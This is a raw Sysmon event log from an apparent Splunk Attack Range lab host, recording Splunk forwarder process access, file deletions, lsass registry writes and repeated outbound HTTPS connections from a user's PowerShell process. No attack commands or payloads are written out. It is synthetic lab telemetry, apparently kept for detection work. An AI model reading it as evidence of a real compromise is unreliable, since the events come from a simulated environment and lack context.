AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.287{B81B27B7-7420-613B-5AB4-03000000C801}42844932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035343443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:29.202{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52557-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035343442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7420-613B-5AB4-03000000C801}4284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7420-613B-5AB4-03000000C801}4284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.071{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7420-613B-5AB4-03000000C801}4284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:04.057{B81B27B7-7420-613B-5AB4-03000000C801}4284C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:05.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1A750A2245CBE1CE1365367A4FD21FB,SHA256=6F73668176DF7CEDFFE4DDE8CC250615666EAA5D70511E6757045AE4FEE9D535,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:05.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3CE9A4CAD4E552A27AC829803EDE7FE,SHA256=5E031C051B14149192F721CA962821EDFE869DB48F5F5ADE0AA18DD6792F51B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:05.070{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE1F087903BD54E454FAC8DD93A0C5EB,SHA256=4CAE5EB7194DA9A06E612ECAB5ED61B5E263CCAE82BDCBEE7B20277448B3E204,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343458Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:06.815{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A705FE1AD6D1AC96A7BCDDE7A88E9D,SHA256=CB929E09DCC7803D5F2A86B01D28E0D40B96424B0587A89DE3CD8021A40DA9FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343457Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:32.041{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52558-false10.0.1.12-8000- 23542300x800000000000000035343460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:07.835{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAF4DC2D0393989E95A023B7A33A483F,SHA256=523347F8D19FF6AEEBA5FA4A44ACD4FF1DE918930112B6FA13F30C6BD7D5999E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:07.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=15ACEA453FFAEDC733DDF61EA4C127EC,SHA256=F30C31554FC21EF5CBD794D97E80D7A3B1B04467DFBFAADD918C098E84B9FA6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:08.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31EF90D1063B94AA4E1740B1944DFC67,SHA256=2115F27630751C7FB4762C7960BAA8965A611B8EEC9E8AF27E9357AADB3CC03D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:33.206{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52559-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:09.881{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5A65F6973A45DC21533F4A8D46B11B7,SHA256=CD91CEF67EFCD2242E555856165F1DBD11879B6C134A8588FD4D6CE19D3E0B21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:10.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF952C90BFEB807B51F2B39BE8DE46D0,SHA256=0A7131442392782BC0241CA368635E5DED8BDDA726A48CF825A89D49CC3279BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343476Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:11.897{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAE360BD8D66EAC12E09BA46DC503CD1,SHA256=73275E4683719A26CEC5068B7309CBC5A9B1001265EF349FE1C2214524A94EEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:37.185{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52560-false10.0.1.12-8000- 13241300x800000000000000035343474Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035343473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x75fbeb4e) 13241300x800000000000000035343472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a64c-0xde57b14f) 13241300x800000000000000035343471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a655-0x401c194f) 13241300x800000000000000035343470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a65d-0xa1e0814f) 13241300x800000000000000035343469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035343468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x75fbeb4e) 13241300x800000000000000035343467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a64c-0xde57b14f) 13241300x800000000000000035343466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a655-0x401c194f) 13241300x800000000000000035343465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:05:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a65d-0xa1e0814f) 23542300x800000000000000035343477Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:12.912{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5BCDD02EC8A47BD16FE985026F116CF,SHA256=4005666E24D5F1226F011E70AEFDF5645499C902E3A710932F9EBD23E4D54BE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343479Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:13.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55EC9BE7A0AB6052FF5D30A0C2F25D39,SHA256=A01684957A36DF85C10A43DB2732EFB12078A9F37DD8BEF7D7896F60F54E6D5A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343478Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:13.333{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=53B7CEE9C72D64FBF11D80E30EC4EA52,SHA256=B7BBD23EA5B53F6F0E94CFAE0B5892E416561F9725EA51B6951517550E81D453,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343481Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:14.964{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208387B26AD7815DC2D668B708147C50,SHA256=E7BB6224AF645790159704CBF98C5EAD8BCA5EF6866EF0EB15851F8285D4B4A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343480Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:39.218{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52561-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343482Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:15.979{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46FCE8CA4413AD51728CEEA1C33C7495,SHA256=049FDD72A75D9F9B94F1572758B28F13B8B6BC71243239E63AA09535B03B1A1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343483Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:16.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22AD604292B188C11C5594BBD0460BC5,SHA256=39FD4BFFCD8992C813BBEB4E6E66D094198E59EED5F9B5F665C7D658E5C7DF65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.979{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-742D-613B-5DB4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.979{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.979{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.979{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 